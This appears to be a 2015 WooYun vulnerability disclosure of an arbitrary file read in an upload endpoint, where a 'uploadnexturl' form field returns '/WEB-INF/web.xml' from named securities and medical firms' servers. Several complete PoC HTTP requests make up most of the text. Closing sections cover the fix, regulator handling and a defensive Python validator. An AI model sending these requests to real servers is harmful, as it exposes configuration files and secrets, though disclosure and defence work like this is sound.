WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-10-12: Details reported to the vendor, awaiting vendor handling
2015-10-16: Vendor confirmed; details disclosed to the vendor only
2015-10-19: Details opened to third-party security partners (绿盟科技 NSFOCUS, 唐朝安全巡航)
2015-12-10: Details opened to core white hats and experts in related fields
2015-12-20: Details opened to ordinary white hats
2015-12-30: Details opened to intern white hats
2016-01-14: Details made public
Arbitrary file traversal
Some cases: http://**.**.**.**/index.php?ac=article&at=list&tid=151
Affected instances include:
Zheshang Securities (浙商证券): **.**.**.**/
Kingdee (金蝶): http://**.**.**.**/
Kaiyuan Securities (开源证券): http://**.**.**.**:8000/
Huaxi Medical Information Service Co., Ltd. (华西医疗信息服务有限公司): **.**.**.**/
and others.
Details decide success or failure. In an earlier report, http://**.**.**.**/bugs/wooyun-2010-0108559, a key parameter named uploadnexturl was found in the upload request packet. Probing it produced the vulnerability PoC below, using Kingdee (金蝶) as the example:
POST http://**.**.**.**/question/attach.upload HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 324
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0EnErIJoOjA86ai0
Referer: http://**.**.**.**/mana/edit/attach_upload.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=ABFC4E4965C0FCB621D58FD7E1F5BC2D

------WebKitFormBoundary0EnErIJoOjA86ai0
Content-Disposition: form-data; name="uploadnexturl"

/WEB-INF/web.xml
------WebKitFormBoundary0EnErIJoOjA86ai0
Content-Disposition: form-data; name="src"; filename="1.jpg"
Content-Type: application/octet-stream

1
------WebKitFormBoundary0EnErIJoOjA86ai0--
Zheshang Securities (浙商证券):
POST **.**.**.**/question/attach.upload HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 307
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0EnErIJoOjA86ai0
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:

------WebKitFormBoundary0EnErIJoOjA86ai0
Content-Disposition: form-data; name="uploadnexturl"

/WEB-INF/web.xml
------WebKitFormBoundary0EnErIJoOjA86ai0
Content-Disposition: form-data; name="src"; filename="1.jpg"
Content-Type: application/octet-stream

1
------WebKitFormBoundary0EnErIJoOjA86ai0--
Kaiyuan Securities (开源证券):
POST http://**.**.**.**:8000/question/attach.upload HTTP/1.1
Host: **.**.**.**:8000
Connection: keep-alive
Content-Length: 307
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: **.**.**.**:8000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0EnErIJoOjA86ai0
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:

------WebKitFormBoundary0EnErIJoOjA86ai0
Content-Disposition: form-data; name="uploadnexturl"

/WEB-INF/web.xml
------WebKitFormBoundary0EnErIJoOjA86ai0
Content-Disposition: form-data; name="src"; filename="1.jpg"
Content-Type: application/octet-stream

1
------WebKitFormBoundary0EnErIJoOjA86ai0--
Huaxi Medical Information Service Co., Ltd. (华西医疗信息服务有限公司):
The above is POC1. POC2, POC3 and POC4 are in the test code. POC3 demonstration:
POST http://**.**.**.**/question/mult.upload HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer:
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df22019904c2
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 692
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=

-----------------------------7df22019904c2
Content-Disposition: form-data; name="uploadnexturl"

/WEB-INF/web.xml
-----------------------------7df22019904c2
Content-Disposition: form-data; name="src"; filename="1.jpg"
Content-Type: audio/wav

1
-----------------------------7df22019904c2
Content-Disposition: form-data; name="width"

360
-----------------------------7df22019904c2
Content-Disposition: form-data; name="height"

240
-----------------------------7df22019904c2
Content-Disposition: form-data; name="insert"

0
-----------------------------7df22019904c2
Content-Disposition: form-data; name="Submitdata"

ȷ 
-----------------------------7df22019904c2--
POC2 demonstration:
POST http://**.**.**.**:8000/question/image.upload HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer:
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df25820904c2
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8000
Content-Length: 874
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=

-----------------------------7df25820904c2
Content-Disposition: form-data; name="uploadnexturl"

/WEB-INF/web.xml
-----------------------------7df25820904c2
Content-Disposition: form-data; name="src"; filename="1.jpg"
Content-Type: image/pjpeg

1
-----------------------------7df25820904c2
Content-Disposition: form-data; name="Submitdata"

ȷ 
-----------------------------7df25820904c2
Content-Disposition: form-data; name="alt"


-----------------------------7df25820904c2
Content-Disposition: form-data; name="align"


-----------------------------7df25820904c2
Content-Disposition: form-data; name="border"


-----------------------------7df25820904c2
Content-Disposition: form-data; name="hspace"


-----------------------------7df25820904c2
Content-Disposition: form-data; name="vspace"


-----------------------------7df25820904c2--
POC4 demonstration:
POST **.**.**.**/question/flash.upload HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer:
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df2272a904c2
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 712
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=

-----------------------------7df2272a904c2
Content-Disposition: form-data; name="uploadnexturl"

/WEB-INF/web.xml
-----------------------------7df2272a904c2
Content-Disposition: form-data; name="src"; filename="1.jpg"
Content-Type: application/x-shockwave-flash

1
-----------------------------7df2272a904c2
Content-Disposition: form-data; name="width"

360
-----------------------------7df2272a904c2
Content-Disposition: form-data; name="height"

240
-----------------------------7df2272a904c2
Content-Disposition: form-data; name="insert"

0
-----------------------------7df2272a904c2
Content-Disposition: form-data; name="Submitdata"

ȷ 
-----------------------------7df2272a904c2--
Fix: filter the input.
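Every request above follows the same pattern: the uploadnexturl form field names a server-side path, the upload handler follows it without restricting where it may point, and /WEB-INF/web.xml is returned. The Python below is an added example written for this page, not code from the report or from the affected product. It shows what "filter the input" means in practice for such a parameter: a server-side validator that only accepts site-relative paths staying inside an assumed upload root (/upload, a constructed value), plus a small multipart parser that pulls uploadnexturl out of a constructed request body shaped like the ones above, so the same check can be run over captured traffic or logs to flag the requests.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed assumption: the only directory a "next URL" parameter may point into.
UPLOAD_ROOT = "/upload"

# Constructed sample body shaped like the attach.upload requests in the report
# (same boundary and field names; the bytes are ours, not captured traffic).
BOUNDARY = b"----WebKitFormBoundary0EnErIJoOjA86ai0"
SAMPLE_BODY = b"".join([
    b"--" + BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="uploadnexturl"\r\n\r\n',
    b"/WEB-INF/web.xml\r\n",
    b"--" + BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="src"; filename="1.jpg"\r\n',
    b"Content-Type: application/octet-stream\r\n\r\n",
    b"1\r\n",
    b"--" + BOUNDARY + b"--\r\n",
])


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Minimal multipart/form-data parser.

    Returns {field_name: (filename_or_None, value_bytes)}. Enough for audit
    scripts over captured requests; not a replacement for a real parser.
    """
    fields = {}
    for segment in body.split(b"--" + boundary)[1:]:
        if segment.startswith(b"--"):          # "--boundary--" closes the body
            break
        head, sep, payload = segment.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if not sep:
            continue
        name = re.search(rb'name="([^"]*)"', head)
        if not name:
            continue
        filename = re.search(rb'filename="([^"]*)"', head)
        if payload.endswith(b"\r\n"):          # CRLF that precedes the next delimiter
            payload = payload[:-2]
        fields[name.group(1).decode()] = (
            filename.group(1).decode() if filename else None,
            payload,
        )
    return fields


def is_safe_next_url(value: str, root: str = UPLOAD_ROOT) -> bool:
    """Accept only site-relative paths that stay inside `root` after normalisation."""
    value = unquote(value)                     # one decode, as the container would do
    if not value or "\x00" in value or "\\" in value or "%" in value:
        return False                           # NUL, backslash, or double-encoding
    if "://" in value or value.startswith("//") or not value.startswith("/"):
        return False                           # absolute, protocol-relative, or relative
    norm = posixpath.normpath(value)           # collapses "." and ".." segments
    base = posixpath.normpath(root)
    if not (norm == base or norm.startswith(base.rstrip("/") + "/")):
        return False                           # escaped the upload area
    lowered = norm.lower() + "/"
    if "/web-inf/" in lowered or "/meta-inf/" in lowered:
        return False                           # defence in depth even if root is "/"
    return True


def audit_request(body: bytes, boundary: bytes) -> list:
    """Return findings for one upload request; an empty list means nothing flagged."""
    findings = []
    fields = parse_multipart(body, boundary)
    if "uploadnexturl" in fields:
        target = fields["uploadnexturl"][1].decode("utf-8", "replace")
        if not is_safe_next_url(target):
            findings.append("uploadnexturl leaves the upload area: %r" % target)
    return findings


if __name__ == "__main__":
    for finding in audit_request(SAMPLE_BODY, BOUNDARY):
        print(finding)
```

The validator normalises before comparing, so "/upload/../WEB-INF/web.xml" and its percent-encoded form are rejected for the same reason as a bare "/WEB-INF/web.xml": after normpath the path no longer sits under the allowed root. Rejecting any remaining "%" after a single decode closes the double-encoding variant without trying to enumerate encodings.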
Severity: High
Vulnerability Rank: 11
Confirmation time: 2015-10-16 15:42
CNVD confirmed and reproduced the described situation. It has been handed over to CNCERT, which notified the software vendor by e-mail through its public contact channel and also notified the securities-industry IT regulator, which will coordinate handling with the site operators.
None yet.